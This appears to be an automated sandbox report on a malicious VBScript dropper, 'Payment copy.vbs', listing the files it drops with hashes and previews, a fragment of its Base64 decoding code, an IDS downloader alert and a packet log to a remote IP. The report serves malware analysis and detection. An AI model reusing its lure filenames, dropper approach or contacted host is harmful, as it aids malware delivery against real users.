SHA1:	54013D76C15CCE880BA2DFA7D34E4AB0BDBE83FC
SHA-256:	E8F40FF3793B165AD4110D7CC1E6E370B6241B29E35B3B0E9AE99E51E4BD543B
SHA-512:	3DDD25A8F4FB99EC483F571914FC6807734516FCD879761A87E835307E92FE2483F9D8F2F2CACFF864D0AB424B48294555B4FB40546DF21161B708CA5AC246AF
Malicious:	false
Reputation:	low
Preview:	........AV........=....................................................,............@......................................r.............................................................R................................................H............N.............L.............+....................................................................z............b.............................K.........r.........................g.........................u...........................................................................................................................................................................................J...)......q...................................................................................................S.....y..........................y.6...................S............................................=....Y.......................................l..d.....................@.............................q...............0..................D...............

C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Omarbejdelsers.Vej

Download File

Process:	C:\Users\user\AppData\Local\Temp\temp_executable.exe
File Type:	data
Category:	dropped
Size (bytes):	229183
Entropy (8bit):	7.481891661221711
Encrypted:	false
SSDEEP:	3072:MZ9sfapoPC4FKfI5MRmNDyCwQ5CZagzG6kZTvwlu7Z8qtGoH+mYPMGy0q3KsrSjn:M4CpvKQ8S2xUqt+Q0q3KsE5ABAnp6HY
MD5:	379294FDCCE775D9CE733A0B7294260C
SHA1:	3DAEF772A4F4688C95EA08CCBEF2ED424BFDEB90
SHA-256:	F6705A6AF06A62741E627CE8D357EEBA5A35931879F92C56C9DC2707FAC3EC4C
SHA-512:	2F038AFE099060C1F2ADFEF6BCF4137F81044F55ECF64D26EEF5611CFDD44E85B7DA80BEC08E72FA3888BA276AED1A55901C08DBEDACF27C887281F3DBFF34CA
Malicious:	false
Preview:	.....Y....///....nnn.........VV..1111............LL.......E..........8.....!!!.................o.QQQQ...MMM...........vvvvv.TT.........................v....RR..............v.>._...........................................00...............E..n.............S..$$...===......].....G..--.........>......V....++++.zzz....22.J...............R....P............Q..........u..ZZZZ.........s....N..............II.....4.o...............N.......P......................`.............................///......5.QQQ..........o.QQ...11..........A..................SSSSSSSSSSSSSS......C..0............vv...g..&.............v..V......^................................h..................z....ii......................[[..I................!............22......ooo...................{{........Y.....zz...f....<........,,......................J.................................vv...........----.cc...[.%.........m.*...................."".................l...........................Q.....DDD..............................'

C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Polaristic\bordtennisspillere.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\temp_executable.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	581
Entropy (8bit):	4.247738765138132
Encrypted:	false
SSDEEP:	12:eiwqgdTZq+M/MvHk6WBhciFy0oAXRwzAwGdxFh/Zk4PW6://QTOxLBhciFJwfGRRB
MD5:	A2BEE9525A0EB672F9D7C6ED55FC4277
SHA1:	8797F725F3C1F58853BDDF233CF3AD8FB25B96B8
SHA-256:	465809DC29146F2953E585A70F7C0F4EB8DFAECD1B5E0044BA3E84F7CB369EF4
SHA-512:	23055FFBE3080E2AC583108D8F04A8C39F86A9B6061078DC7E857F2D55E87995DAFBC2BC92A6E1138E8C4746349CEDD841D57CE0C1053561B4F13A941AFC2DB3
Malicious:	false
Preview:	artiskokkers theatricalising serviceorganisationens sadomasokist specialet viragoes teksturens drosselventilen dorsoanterior lyle connexiva anlbshavnenes fantasipris..bkkenbund crackups smelteovne trampolinernes.akvamarins sdefdselen paragrafrytter strabadseringer paasejling chromicise opkaldninger oprykkedes jehulen drejede unfraternising roitelet marketenderes..trvesmulds lymphorrhea sharpe prevened patulous tandhjulets feudaltidernes,klagetemaers inexpleble sekundanten radioapparat ostreidae pragmatikers paleobotanist commonalties unreparted..spigr midtowns biomstndighed,

C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Polaristic\falsework.pal

Download File

Process:	C:\Users\user\AppData\Local\Temp\temp_executable.exe
File Type:	data
Category:	dropped
Size (bytes):	368479
Entropy (8bit):	1.2529543823589329
Encrypted:	false
SSDEEP:	1536:tQVWVhMfKCe/xuJeVqJTfk894T2Vdxg6O6/:sKhM9eg+qVkI4yZo6/
MD5:	D4FB58D0C2D76DF9F83C7A35C6AB87BD
SHA1:	85C3135397993DB1194516AB38F28367A5376C7F
SHA-256:	6A82CFEB143DF6CE6AF2B4C0DE44BBA58B291A7156E4E083CB279918E7986788
SHA-512:	73B456FF13154CD4B082A89C45FC7BD0C8E5BA26BBF8B8148E4B37E537A5C51209F9E2FBB60DAD4B83CF592EB37EEACFB27E36314503A8AA319AFC3C6CDA85B6
Malicious:	false
Preview:	......l...............)..............................................g..........................<..........................................'....U................................................................V......................................................;......................?I..........h..............\|........................................................................y.......................................................................w...........................................Y...............................................x...........................=..i...................7.....................$...................v............)......F.........................................................................................4..........D..]........................................\........[....................................................5...........:.............Z.E.............>...... ...............................Z.................n.............................

C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit\halvdagsstillingerne.run

Download File

Process:	C:\Users\user\AppData\Local\Temp\temp_executable.exe
File Type:	data
Category:	dropped
Size (bytes):	485274
Entropy (8bit):	1.2570482706289725
Encrypted:	false
SSDEEP:	1536:zprlz03eesdLNNRG1seTqgPcjek1qmE28Cvo:zpJ0tgXIsePYv1qO
MD5:	4F3056AE6E63F803C909F39DE6A4E4F2
SHA1:	6ABC069B436C5B9807421F678E38C20813A7FB6A
SHA-256:	5DD4899CACB0CB0DAA3BCFAC4010E784F4CAA32655F018D4A83E0C4C7C8B74A7
SHA-512:	EF4AC1C52EAF4A4FAF5EF1260C3E51F699A844EAAAF9746B2910B6BE3A48968F1001C4B2740D10BCF3F8AB7809C7695FE418237351B8EDD757B4F1FCD66B0CCB
Malicious:	false
Preview:	................................................................................................................................e...........................a......................9.............>..................V.................k.......U.................................................u.....Q.......................................................................Z...................................................................................................................................O...........................................................................?.........e..........+.....l..............................-...........O............X........................................2...............................u.......................................................k........g..........................................................................................&.................................m................S....................................................o.C.......

C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit\inshrine.dis

Download File

Process:	C:\Users\user\AppData\Local\Temp\temp_executable.exe
File Type:	data
Category:	dropped
Size (bytes):	224663
Entropy (8bit):	1.2605625692541917
Encrypted:	false
SSDEEP:	768:7Z7wfFTLxvdkcxqASGj3xSNrThO/Zolgzcxl8C8RMYTX22DtsBbgIflPkjjvaM9w:2Nl2pJig1wiskjgQ
MD5:	07437DF4326D58E6A143168479E5D29A
SHA1:	1BE5D0DB5B7548439E2B78486842C74BFB6383FD
SHA-256:	8993114407456C6D9CA7F6EBD1A0A17B6782A7FBE8285280472D636DB9A112D8
SHA-512:	D797B5B452F68FE15DB6B61ECD8BB808B53C6518287F3CB520B1F6089EB39CBBD24E48913B48437425268EAEFB9672D863FFC140A2C257F6269F7E19A35C5B70
Malicious:	false
Preview:	...............B.....................M................H.........m.....b...........................................P..............................s........Y...............................*...........................................................W.............................................f...................d.....................................P...........;.........................................................................I............................................................S................................0...........................~...Q..............p............."......................F...........................%.......`............................................................>......Ku.....-....#.1.............................................K........>......................................................]..........T.T...................................................r.........~=.....{..................................=........./.......$.......e..............

C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit\overreacted.ins

Download File

Process:	C:\Users\user\AppData\Local\Temp\temp_executable.exe
File Type:	Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
Category:	dropped
Size (bytes):	40518
Entropy (8bit):	1.2432837040632625
Encrypted:	false
SSDEEP:	384:irrisGf4AVsRePdfnAXWMwNqse2afUDUKHlHWgooi:Ok9AXCqsoUflHWld
MD5:	8DA91BF8F61EC9213853BE5029C28642
SHA1:	107E53B89C087EB27B9BAECA1567AB6FDF4C4C6F
SHA-256:	72EB5DC647ECE46BED97D5B9858DD3008AAF63C1B8DD54CF6E407F1F0A0880D2
SHA-512:	9A6D7022A9F07B57C737849AC3871F7B76280F56509F5715AFD03D64EA43E3629678B02195367EA8632D36BC86FE02F341FA509D2CD034E83D9DC75BB473AFFB
Malicious:	false
Preview:	....................................._............................~.........................8..........<..............................8..................-...................G...........................................................................................................................................*..=.........................................................................................v.............................................................j.........................7.......................................]..........c..........................................................w..................................................._.................!.........../..................................^..................................o....6........................A...........x.........................................b.....[.......IN...........5.................................................J..................D..........=....................................................

C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\blepharostat.str

Download File

Process:	C:\Users\user\AppData\Local\Temp\temp_executable.exe
File Type:	data
Category:	dropped
Size (bytes):	160082
Entropy (8bit):	1.2402700863301843
Encrypted:	false
SSDEEP:	768:cs4KgBhZobYVCLYip1ev9yBYIqf2Iv7uD4zrly7+eaYHJFihH6AMp8S6cGT099IK:cfhjLekt/BOT5o1K
MD5:	F43ABF4AC85CDF7C310AD9C5699AD8DE
SHA1:	05A379A7F953CC80D2F4C9827D8499F1E96BDE87
SHA-256:	271EEB9BCFB8D226539223CAFA6801E963196B4D334659D02998D119C6ACC224
SHA-512:	6587CCEF3AFB4F6E31B7D775BD6CE02C8AC2FEE7CC00CA367F4F83761ED5BC40F1276CE111B768994FC2F88881F357D2660794E3E3F8329D47C974866A6CBA21
Malicious:	false
Preview:	..............................................$..................................................`...............................................................................8..........*...K....4...........(..............................................j.................q............................................\|...........................P.............................G...................J.......7.........................................L.....................4............~................K............................0.............0.....g...0.....zn.......................L.../.....................#..........e.......................................I.....................................................................................................8..Y.......................................&.....................................6.............................;........................l.......D.............................I...........X...................................................

C:\Users\user\AppData\Local\Temp\nsfBB16.tmp\System.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\temp_executable.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	5.757895701334371
Encrypted:	false
SSDEEP:	192:aVL7iZJX76BisO7+UZEw+Rl59pV8ghsVJ39dx8T:d7NsOpZsfLMJ39e
MD5:	A436DB0C473A087EB61FF5C53C34BA27
SHA1:	65EA67E424E75F5065132B539C8B2EDA88AA0506
SHA-256:	75ED40311875312617D6711BAED0BE29FCAEE71031CA27A8D308A72B15A51E49
SHA-512:	908F46A855480AF6EACB2FB64DE0E60B1E04BBB10B23992E2CF38A4CBEBDCD7D3928C4C022D7AD9F7479265A8F426B93EEF580AFEC95570E654C360D62F5E08D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SpdbSuite_v10.8_LANG.exe, Detection: malicious, Browse Filename: SpdbSuite_v10.8_LANG.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.Win32.VMProtect.31640.28512.exe, Detection: malicious, Browse Filename: Gescanntes Artikelliste_Bestellnummer 25477.vbs, Detection: malicious, Browse Filename: Gescanntes Artikelliste_Bestellnummer 25477.vbs, Detection: malicious, Browse Filename: Fac001982024-06-05.pdf.exe, Detection: malicious, Browse Filename: ALGOI-la tabla de c#U00e1lculos.xlsl.exe, Detection: malicious, Browse Filename: Fac001982024-06-05.pdf.exe, Detection: malicious, Browse Filename: ALGOI-la tabla de c#U00e1lculos.xlsl.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L...z.oS...........!................$'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...o........................... ..`.rdata..C....0......."..............@..@.data...h....@.......&..............@....reloc..F....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\temp_executable.exe

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	1098840
Entropy (8bit):	7.22405695779331
Encrypted:	false
SSDEEP:	12288:x9XMnptEWw7TAIh1LSw84bjZgyrMNAzP6RtRQXl51KBkpw8+QZ0:rcnsWw7sIh1uQba4mRjQVP2UkV
MD5:	4648A0278BD003C324FCD7E7779DCF99
SHA1:	401623540094E2EEF531D366D8C155C1D3D72ABB
SHA-256:	49260A07FF0D5C06EFDFC3985BCC44D6DF5CF2A56810F01C3243684B950264CC
SHA-512:	198D5DB4BB4F612645786C27CDACB26665DB4099CD8580091ADF86D9D84FC16278D3A87C410912CB4968C630DCA1CC14432551673FB7653AD83F28B601720DA5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....oS.................^...\|.......0.......p....@.................................g........................................t.......P...7..........p................................................................p...............................text....].......^.................. ..`.rdata.......p.......b..............@..@.data....T...........v..............@....ndata...`...............................rsrc....7...P...8...z..............@..@................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	ASCII text, with very long lines (65399), with CRLF line terminators
Entropy (8bit):	5.567462902992217
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	Payment copy.vbs
File size:	1'681'870 bytes
MD5:	237ab08466bfa23450bb6266af82667f
SHA1:	a82af4e2d1367d941bf7576a83219dc4ef0b6f99
SHA256:	24843276944661cf3b13a9297843687f6b6fa1111d51bca9d73c45fa35bc4c7a
SHA512:	03bab4a6f5797169fbee90def5f4c51a02f8725afb45a090f53fc3f20d395438a82812b30bd81d24129024142ff3b1c39c2b77c1d7931a02cf5899df72953b71
SSDEEP:	24576:2Eeps6dHJFR2QlXTu3AoZBn7aw6ccWtxSX3KAHSh:0s6dt8x7r5cI
TLSH:	D8752898DB27B4CF5DC7017C9B069FC36C484AA44B96EEC4949E35AE6CC04628BB7374
File Content Preview:	' Main script logic for processing Base64-encoded data....' Initialize the Base64 encoded string (placeholder)..Dim encodedBase64String..encodedBase64String = "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T09:30:11.363135+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.11.20	49756	170.249.236.53	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 09:30:10.795205116 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:10.795336008 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:10.795581102 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:10.827111959 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:10.827178955 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.090112925 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.090435028 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.142286062 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.142330885 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.143537998 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.143805981 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.145914078 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.192181110 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.363318920 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.363523960 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.363600016 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.363791943 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.482167006 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.482175112 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.482304096 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.482352972 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.482495070 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.482506990 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.482547998 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.482637882 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.482647896 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.482753992 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.482763052 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.482923985 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.601429939 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.601495028 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.601665020 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.601665974 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.601665974 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.601744890 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.601775885 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.601775885 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.601775885 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.601921082 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.602622986 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.602689028 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.602845907 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.602845907 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.602897882 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.602919102 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.603025913 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.603533030 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.603591919 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.603676081 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.603676081 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.603720903 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.603821039 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.603821039 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.603821039 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.603849888 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.603984118 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.723041058 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.723144054 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.723227024 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.723356009 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.723356009 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.723421097 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.723660946 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.724479914 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.724543095 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.724615097 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.724615097 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.724669933 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.724669933 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.724669933 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.724669933 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.724725008 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.724741936 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.724787951 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.724886894 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.725503922 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.725557089 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.725641966 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.725641966 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.725688934 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.725688934 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.725688934 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.725688934 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.725730896 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.725809097 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.725964069 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.725992918 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.726120949 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.726305962 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.726460934 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.726460934 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.726491928 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.726540089 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.726540089 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.726540089 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.726540089 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.726586103 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.726650953 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.726769924 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.727170944 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.727224112 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.727374077 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.727374077 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.727410078 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.727431059 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.727431059 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.727497101 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.727546930 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.728048086 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.728127956 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.728235006 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.728235960 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.728235960 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.728292942 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.728292942 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.728338003 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.728363037 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.728499889 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.846535921 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.846579075 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.846738100 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.846738100 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.846784115 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.846796989 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.846796989 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.846846104 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.846947908 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.847347021 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.847387075 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.847538948 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.847538948 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.847538948 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.847538948 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.847593069 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.847593069 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.847593069 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.847618103 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.847640991 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.847640991 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.847759962 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.848058939 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.848098993 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.848206043 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.848206043 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.848254919 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.848254919 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.848254919 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.848254919 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.848254919 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.848294020 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.848360062 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.848437071 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.849011898 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.849073887 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.849183083 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.849184036 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.849323988 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.849366903 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.849544048 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.849874020 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.849946022 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.850054026 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.850054026 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.850096941 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.850120068 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.850147009 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.850147009 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.850311041 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.850369930 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.850559950 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.850653887 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.850714922 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.850857019 CEST	49756	443	192.168.11.20	170.249.236.53
